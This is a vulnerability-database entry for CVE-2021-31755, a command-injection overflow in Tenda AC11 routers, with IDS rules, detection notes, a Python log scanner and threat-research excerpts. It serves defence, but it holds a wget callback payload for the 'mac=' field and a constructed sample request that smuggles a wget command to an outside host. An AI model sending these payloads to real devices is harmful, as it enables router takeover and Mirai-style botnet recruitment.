CVE-2021-31755
Published: 2021-05-07
Priority: P197 · critical 9.8 (CVSS 3.1) · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2021-11-17
Exploited in the wild
EPSS: 85.85% (99.7th percentile)
An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tenda | ac11_firmware | <= 02.03.01.104_cn | — |
Detection & IOCs
command: `mac=wget+http://{{interactsh-url}}`
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31755.yaml; reference:cve,2021-31755; classtype:attempted-admin; sid:2033284; rev:5; metadata:attack_target Networking_Equipment, tls_state plaintext, created_at 2021_07_08, cve CVE_2021_31755, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_10_21, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; content:"|3b|"; within:40; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:cve,2021-31755; classtype:attempted-admin; sid:2033285; rev:2; metadata:created_at 2021_07_08, cve CVE_2021_31755, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
- Exploit targets HTTP POST to /goform/setmac with a crafted `mac=` parameter containing shell metacharacters (e.g., semicolon 0x3b) or OS commands such as wget; inspect the request body for `&mac=` followed by non-MAC-address content within 40 bytes.
- Inbound exploitation attempts arrive as unauthenticated POST requests to /goform/setmac; no prior authentication is required, so any such POST from an external source should be treated as suspicious.
- Outbound callback (OOB/OAST) via wget to an attacker-controlled host is a reliable indicator of successful exploitation; monitor for unexpected outbound HTTP from router management IPs.
- Nuclei template uses interactsh OOB interaction confirmation (HTTP protocol response) as the positive match condition for exploitation.
- Associated with Mirai botnet campaigns; detections should be correlated with known Mirai IoT exploitation activity.
- Vulnerable firmware version is 02.03.01.104_CN and below; detections should be scoped to Tenda AC11 devices running this firmware range.
- The ET Inbound rule (sid:2033284) targets plaintext HTTP only (tls_state plaintext); encrypted management interfaces would not be covered by this signature.
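The detection guidance above (flag a POST to /goform/setmac whose `mac=` value is not a plain MAC address, and check for a `;` within 40 bytes of the parameter as the ET outbound rule does) is straightforward to turn into a log-review script. The following is an added example, not code from this page or from any of the cited sources; it assumes raw HTTP/1.1 request text as input, and the sample requests and the 203.0.113.0/24 address are constructed for illustration.

```python
"""Flag HTTP POSTs to /goform/setmac whose mac= parameter is not a plain MAC address.

Added example for CVE-2021-31755 detection triage; sample requests below are constructed.
"""
import re
from urllib.parse import unquote_plus

# A well-formed MAC address: six hex octets separated by ':' or '-'
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5}$")
# Shell metacharacters that have no business inside a MAC address field
SHELL_META = frozenset(";|&`$()<>\n")
# Mirrors the ET outbound rule: a ';' (0x3b) within 40 bytes after "mac="
WINDOW = 40


def parse_http_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None, None, body
    return parts[0], parts[1], body


def inspect_setmac(raw: str):
    """Return a finding dict for a suspicious /goform/setmac POST, else None."""
    method, path, body = parse_http_request(raw)
    if method != "POST" or path is None or path.split("?", 1)[0] != "/goform/setmac":
        return None
    match = re.search(r"(?:^|&)mac=([^&]*)", body)
    if not match:
        return None
    encoded = match.group(1)
    decoded = unquote_plus(encoded)  # '+' -> ' ', '%3B' -> ';'
    reasons = []
    if not MAC_RE.match(decoded):
        reasons.append("mac value is not a MAC address")
    meta = sorted(SHELL_META & set(decoded))
    if meta:
        reasons.append("shell metacharacters " + repr(meta))
    # Look at the raw (undecoded) bytes after "mac=", the way the signature sees them
    start = match.start(1)
    window = body[start:start + WINDOW].lower()
    if ";" in window or "%3b" in window:
        reasons.append("semicolon within %d bytes of mac=" % WINDOW)
    if not reasons:
        return None
    return {"path": path, "mac_param": decoded, "reasons": reasons}


def scan(requests):
    """Run inspect_setmac over a batch of raw requests and keep the findings."""
    return [f for f in (inspect_setmac(r) for r in requests) if f]


# Constructed sample traffic: one benign setmac call, one matching the page's IOC
# shape (semicolon plus wget), one wrong path, one wrong method.
SAMPLE_REQUESTS = [
    "POST /goform/setmac HTTP/1.1\r\nHost: 192.168.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 21\r\n\r\n"
    "mac=00:11:22:33:44:55",
    "POST /goform/setmac HTTP/1.1\r\nHost: 192.168.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 55\r\n\r\n"
    "mac=00:11:22:33:44:55%3Bwget+http://203.0.113.10/probe",
    "POST /goform/setwifi HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\nmac=00:11:22:33:44:55;x",
    "GET /goform/setmac?mac=00:11:22:33:44:55 HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The decoded-value check catches payloads the byte-level signature misses (a `%3B` that is only a semicolon after URL decoding), while the raw 40-byte window keeps parity with sid:2033285 so results from this script and from the IDS can be compared line for line.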
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
CISA
Tenda AC11 Router Stack Buffer Overflow Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2021-31755 [CRITICAL] CWE-787 Tenda AC11 Router Stack Buffer Overflow Vulnerability
Vulnerability: Tenda AC11 Router Stack Buffer Overflow Vulnerability
Affected: Tenda AC11 Router
Tenda AC11 devices contain a stack buffer overflow vulnerability in /goform/setmac which allows attackers to execute code via a crafted post request.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-31755
Remediation Due Date: 2021-11-17
GHSA
GHSA-539c-2w6v-9rwx: An issue was discovered on Tenda AC11 devices with firmware through 02
ghsa_unreviewed·2022-05-24
CVE-2021-31755 [CRITICAL] CWE-787 GHSA-539c-2w6v-9rwx: An issue was discovered on Tenda AC11 devices with firmware through 02
An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.
VulnCheck
Tenda AC11 Router Stack Buffer Overflow Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-31755 [CRITICAL] CWE-787 Tenda AC11 Router Stack Buffer Overflow Vulnerability
Tenda AC11 devices contain a stack buffer overflow vulnerability in /goform/setmac which allows attackers to execute code via a crafted post request.
Affected: Tenda AC11 Router
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-31755; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-2
Suricata
ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)
suricata·2021-07-08·CVSS 9.8
CVE-2021-31755 [CRITICAL] ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31755.yaml; reference:cve,2021-31755; classtype:attempted-admin; sid:2033284; rev:5; metadata:attack_target Networking_Equipment, tls_state plaintext, created_at 2021_07_08, cve CVE_2021_31755, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, ta
Suricata
ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)
suricata·2021-07-08·CVSS 9.8
CVE-2021-31755 [CRITICAL] ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; content:"|3b|"; within:40; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:cve,2021-31755; classtype:attempted-admin; sid:2033285; rev:2; metadata:created_at 2021_07_08, cve CVE_2021_31755, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Nuclei
Tenda Router AC11 - Remote Command Injection
nuclei·CVSS 9.8
CVE-2021-31755 [CRITICAL] Tenda Router AC11 - Remote Command Injection
Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
Template:
id: CVE-2021-31755
info:
name: Tenda Router AC11 - Remote Command Injection
author: gy741
severity: critical
description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected rou
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
By Yue Guan, Jin Chen, Leo Olson, Wayne Xin and Daiping Liu | Published: October 14, 2021
Fortinet
The Ghosts of Mirai | FortiGuard Labs
blogs_fortinet·2021-06-24
By David Maciejak and Joie Salvio | June 24, 2021
FortiGuard Labs Threat Research Report
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
It has been almost five years since the source code of the notorious MIRAI IoT malware was released to the public by its author in late 2016. This event led to the emergence of numerous copycats, creating their own flavors of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same.
IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. They also seek
Timeline
- 2021-05-07: Published
- 2021-11-03: Added to CISA KEV
- Exploited in the wild